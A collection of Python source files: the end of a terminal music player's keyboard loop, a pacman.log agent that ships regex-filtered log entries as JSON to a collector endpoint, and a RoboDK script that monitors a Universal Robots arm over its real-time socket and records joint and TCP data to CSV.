    while key != 'q':
        key = getkey()
        if key == 's':
            song = input(Fore.WHITE + 'Search new song: ' + Fore.RESET)
            delete_lines(1)
            QUIT_SEARCH = False
            anim = threading.Thread(target=search_animation)
            anim.start()
            QUIT_SEARCH = yt_music.search(song=song)
            anim.join()
        if key == 'i':
            yt_music.prev()
        elif key == 'o':
            yt_music.play_pause()
        elif key == 'p':
            yt_music.next()
        elif key == 'm':
            yt_music.mute()
        elif key == keys.LEFT:
            yt_music.backward()
        elif key == keys.RIGHT:
            yt_music.forward()
        elif key == keys.UP:
            yt_music.volume_up()
        elif key == keys.DOWN:
            yt_music.volume_down()
        elif key == 'q':
            # Shut down the display thread, clear the panel, close the player.
            global QUIT_DISPLAY
            QUIT_DISPLAY = True
            delete_lines(LINE_BUFFER)
            yt_music.quit()
if __name__ == "__main__":
    # Entry point: parse the CLI arguments, then hand off to the event loop.
    cli_args = parse_args()
    application(cli_args)
pacman-log-agent.py
"""pacman-log-agent: read pacman.log, filter lines by a regex, and ship the
matching entries as structured JSON records to a log-collector endpoint."""
from datetime import datetime
from pprint import pprint
from threading import Thread
import psutil, socket, json, re
import time, sys, requests


def filterLog(line, filter_by):
    """Return True when *line* matches the configured *filter_by* regex."""
    # re.search returns a Match object or None; collapse to a plain bool
    # instead of the original if/return-True/return-False ladder.
    return re.search(filter_by, line) is not None


def parseProcessInfo():
    """Return a 'name[pid]' tag describing the current agent process."""
    processDict = psutil.Process().as_dict(attrs=['pid', 'name'])
    return '{}[{}]'.format(processDict['name'], processDict['pid'])


def parseLog(line):
    """Parse one pacman.log line into a structured log record (dict).

    Expects the pacman format '[YYYY-MM-DD HH:MM] [...] message'.
    Raises ValueError/IndexError on lines that do not match that shape.
    """
    log = {}
    # Leading '[timestamp]' bracket, minus the opening '['.
    log["logged_time"] = str(datetime.strptime(line.split('] [')[0][1:], '%Y-%m-%d %H:%M'))
    # Severity is inferred from the action keyword in the message body.
    log["severity"] = 'ALERT' if 'removed' in line else 'WARNING' if 'installed' in line else 'INFO'
    log["host"] = socket.gethostname()
    log["process"] = parseProcessInfo()
    # Keep everything from the second bracket onward, restoring its '['.
    log["message"] = {"content": '[{}'.format(line.split('] [')[1])}
    return log


def readConf():
    """Read (log_file_path, filter) from pacman-log-agent.conf (JSON).

    Raises FileNotFoundError / json.JSONDecodeError / KeyError on a missing
    or malformed configuration file.
    """
    # Use a context manager so the config file handle is closed
    # (the original json.load(open(...)) leaked it).
    with open('pacman-log-agent.conf') as conf_file:
        data = json.load(conf_file)
    return data['log_file_path'], data['filter']


if __name__ == '__main__':
    log_file_path, filter_by = readConf()
    logs = []
    # Collector endpoint; a single CLI argument overrides the default.
    url = "http://localhost:3000/logs" if len(sys.argv) != 2 else sys.argv[1]
    headers = {'Content-type': 'application/json'}

    def sendLogs():
        """POST any queued log records to the collector, then return.

        Written as a loop so it can also run as the (commented-out) daemon
        thread below; when called synchronously it sends at most one batch.
        """
        while True:
            if len(logs) > 0:
                # Snapshot-and-clear so a concurrent producer is not lost.
                received_logs = list(logs)
                logs.clear()
                r = requests.post(url, json={"agent": "pacman", "logs": received_logs}, headers=headers)
                if r.status_code == 200:
                    print('Logs have been sent successfully')
            # NOTE(review): the collapsed original made the indentation of this
            # return ambiguous; placing it at loop level makes the direct call
            # below terminate even when no lines matched — confirm intent.
            return

    with open(log_file_path) as f:
        for line in f.readlines():
            line = line.rstrip()
            if filterLog(line, filter_by):
                logs.append(parseLog(line))

    # Thread(target=sendLogs, daemon=True).start()
    sendLogs()
UR_Monitoring_CSV.py
# This script creates a thread to monitor the position and other variables from a real UR robot and stores the data to a CSV file
# With this script running, RoboDK will save a CSV file of the robot status
#
# Press F5 to run the script
# Or visit: http://www.robodk.com/doc/en/PythonAPI/
from robodk.robolink import *  # API to communicate with RoboDK
from robodk.robomath import *  # Robot toolbox (pi, norm, tic/toc, pause)
import threading
import socket
import struct
import os
import time

TOLERANCE_JOINTS_REFRESH = 1e9  # Refresh the screen every time the robot position changes by this much (in deg)
RETRIEVE_JOINTS_ONCE = False  # If True, the current robot position will be retrieved once only
SAVE_CSV_FILE = True  # If True, the position and speed of the TCP will be recorded with a time stamp

# Create targets given a tolerance in degrees
CREATE_TARGETS = False
TOLERANCE_JOINTS_NEWTARGET = 1e9  # tolerance in degrees

REFRESH_RATE = 0.01  # Display rate in RoboDK

# Make current robot joints accessible in case we run it on a separate thread
# (NOTE: 'global' at module level is a no-op; kept only to document the shared variable)
global ROBOT_JOINTS


def Robot_Joints_Check(jA, jB, tolerance_deg=1):
    """Return True when joints jA and jB differ by more than the tolerance on
    any of the 6 axes, or when jA is None (no previous reading)."""
    if jA is None:
        return True
    # NOTE(review): the joint lists are stored in degrees but the tolerance is
    # converted to radians here; harmless with the huge 1e9 defaults, but
    # verify before using small tolerances.
    for i in range(6):
        if abs(jA[i] - jB[i]) > tolerance_deg * pi / 180:
            return True
    return False


#########################################################################
# Byte shifts to point to the right byte data inside a packet
UR_GET_TIME = 1
UR_GET_JOINT_POSITIONS = 252  # Real Joint Position
UR_GET_JOINT_SPEEDS = 300  # Real Joint Speeds
UR_GET_JOINT_CURRENTS = 348
UR_GET_TCP_POSITION = 444  # Real TCP position
UR_GET_TCP_SPEED = 492  # Real TCP speed
UR_GET_TCP_FORCES = 540
UR_GET_INPUTS = (86 - 32) * 8 + 252
UR_GET_OUTPUTS = (131 - 32) * 8 + 252


def packet_size(buf):
    """Return the declared packet length (bytes) at the head of buf, or 0 if
    fewer than 4 bytes are buffered."""
    if len(buf) < 4:
        return 0
    return struct.unpack_from("!i", buf, 0)[0]


def packet_check(buf):
    """Return True when buf holds at least one complete packet."""
    msg_sz = packet_size(buf)
    if len(buf) < msg_sz:
        print("Incorrect packet size %i vs %i" % (msg_sz, len(buf)))
        return False
    return True


def packet_value(buf, offset, nval=6):
    """Unpack nval big-endian doubles from buf starting at byte offset.

    Returns a list of nval floats, or None when the packet is too short
    (e.g. an older Polyscope version without that field).
    """
    # Each double occupies 8 bytes: the original checked only 'offset + nval'
    # bytes, which let struct.unpack_from raise on truncated packets.
    if len(buf) < offset + nval * 8:
        print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
        return None
    return list(struct.unpack_from('!' + 'd' * nval, buf, offset))


def packet_value_bin(buf, offset, nval=8):
    """Return nval bytes at offset rendered as a lowercase hex string, or
    None when the packet is too short."""
    if len(buf) < offset + nval:
        print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
        return None
    return ''.join(format(x, '02x') for x in buf[offset:(offset + nval)])


#########################################################################
# Enter RoboDK IP and Port
ROBOT_IP = None  #'192.168.2.31'
ROBOT_PORT = 30003  # UR real-time (125 Hz) interface

# Start RoboDK API
RDK = Robolink()

# Retrieve a robot
robot = RDK.ItemUserPick('Select a UR robot to monitor', ITEM_TYPE_ROBOT)
if not robot.Valid():
    quit()

robotname = robot.Name()
print("Using robot %s" % robotname)

# Retrieve Robot's IP:
if ROBOT_IP is None:
    ip, port, path, ftpuser, ftppass = robot.ConnectionParams()
    ROBOT_IP = ip

if SAVE_CSV_FILE:
    # Save monitoring to file (station file name minus '.rdk' + timestamp):
    file_path = RDK.getParam('FILE_OPENSTATION')[:-4] + '_Monitoring_%s_%s.csv' % (robotname, time.strftime("%Y-%m-%d-%Hh%Mm%Ss", time.gmtime()))
    print("Monitoring robot %s to %s" % (robotname, file_path))
    fid = open(file_path, 'w')
    fid.write('time (s), Speed (m/s), Speed (rad/s), J1 (deg), J2 (deg), J3 (deg), J4 (deg), J5 (deg), J6 (deg), TCP X (m), TCP Y (m), TCP Z (m), TCP u (rad), TCP v (rad), TCP w (rad), Speed X (m/s), Speed Y (m/s), Speed Z (m/s), Speed u (rad/s), Speed v (rad/s), Speed w (rad/s), Inputs, Outputs\n')

tic()


def on_packet(packet, packet_id):
    """Decode one real-time packet: update ROBOT_JOINTS (degrees) and append
    a CSV row every 5th packet (125/5 = 25 Hz) when SAVE_CSV_FILE is set."""
    global ROBOT_JOINTS

    # Retrieve desired information from a packet
    rob_joints_RAD = packet_value(packet, UR_GET_JOINT_POSITIONS)
    if rob_joints_RAD is None:
        # Truncated or unsupported packet: skip it instead of crashing the
        # monitor thread (the original iterated over None here).
        return
    ROBOT_JOINTS = [ji * 180.0 / pi for ji in rob_joints_RAD]
    ROBOT_TCP_XYZUVW = packet_value(packet, UR_GET_TCP_POSITION)
    ROBOT_TCP_SPEED = packet_value(packet, UR_GET_TCP_SPEED)
    ROBOT_INPUTS = packet_value_bin(packet, UR_GET_INPUTS)
    ROBOT_OUTPUTS = packet_value_bin(packet, UR_GET_OUTPUTS)
    #ROBOT_SPEED = packet_value(packet, UR_GET_JOINT_SPEEDS)
    #ROBOT_CURRENT = packet_value(packet, UR_GET_JOINT_CURRENTS)

    # Record once every 5 packets (125/5=25 Hz)
    if SAVE_CSV_FILE and packet_id % 5 == 0:
        if ROBOT_TCP_XYZUVW is None or ROBOT_TCP_SPEED is None or ROBOT_INPUTS is None or ROBOT_OUTPUTS is None:
            return
        fid.write(str(toc()))  # Write time stamp in seconds
        fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[0:3]))  # Position speed
        fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[3:6]))  # Orientation speed
        for value in ROBOT_JOINTS:
            fid.write(',%.6f' % value)
        for value in ROBOT_TCP_XYZUVW:
            fid.write(',%.6f' % value)
        for value in ROBOT_TCP_SPEED:
            fid.write(',%.6f' % value)
        fid.write(',' + ROBOT_INPUTS)
        fid.write(',' + ROBOT_OUTPUTS)
        fid.write('\n')


def UR_Monitor():
    """Monitor thread: connect to the UR real-time port, feed every complete
    packet to on_packet, and reconnect whenever the robot closes the socket."""
    while True:
        print("Connecting to robot %s -> %s:%i" % (robotname, ROBOT_IP, ROBOT_PORT))
        rt_socket = socket.create_connection((ROBOT_IP, ROBOT_PORT))
        print("Connected")
        buf = b''
        packet_count = 0
        packet_time_last = time.time()
        while True:
            more = rt_socket.recv(4096)
            if not more:
                # Connection closed by the robot: reconnect (the original
                # looped forever on empty reads without ever breaking out).
                break
            buf = buf + more
            # Drain every complete packet currently buffered; the original
            # processed at most one packet per recv and could fall behind.
            # The len(buf) >= 4 guard prevents a zero-length "packet" loop
            # when only a partial header remains.
            while len(buf) >= 4 and packet_check(buf):
                packet_len = packet_size(buf)
                packet, buf = buf[:packet_len], buf[packet_len:]
                on_packet(packet, packet_count)
                packet_count += 1
                if packet_count % 250 == 0:
                    t_now = time.time()
                    msg = "Monitoring %s at %.1f packets per second" % (robotname, packet_count / (t_now - packet_time_last))
                    print(msg)
                    RDK.ShowMessage(msg, False)
                    packet_count = 0
                    packet_time_last = t_now
        rt_socket.close()


ROBOT_JOINTS = None
last_joints_target = None
last_joints_refresh = None

# Start the Robot Monitor thread
#q = queue.Queue()
t = threading.Thread(target=UR_Monitor)
t.daemon = True
t.start()
#UR_Monitor()

# Start the main loop to refresh RoboDK and create targets/programs automatically
target_count = 0
while True:
    # Wait for a valid robot joints reading (sleep instead of busy-spinning)
    if ROBOT_JOINTS is None:
        pause(REFRESH_RATE)
        continue

    # Set the robot to that position
    if Robot_Joints_Check(last_joints_refresh, ROBOT_JOINTS, TOLERANCE_JOINTS_REFRESH):
        last_joints_refresh = ROBOT_JOINTS
        robot.setJoints(ROBOT_JOINTS)

    # Stop here if we need only the current position
    if RETRIEVE_JOINTS_ONCE:
        quit(0)

    # Check if the robot has moved enough to create a new target
    if CREATE_TARGETS and Robot_Joints_Check(last_joints_target, ROBOT_JOINTS, TOLERANCE_JOINTS_NEWTARGET):
        last_joints_target = ROBOT_JOINTS
        target_count = target_count + 1
        newtarget = RDK.AddTarget('T %i' % target_count, 0, robot)

    # Take a short break
    pause(REFRESH_RATE)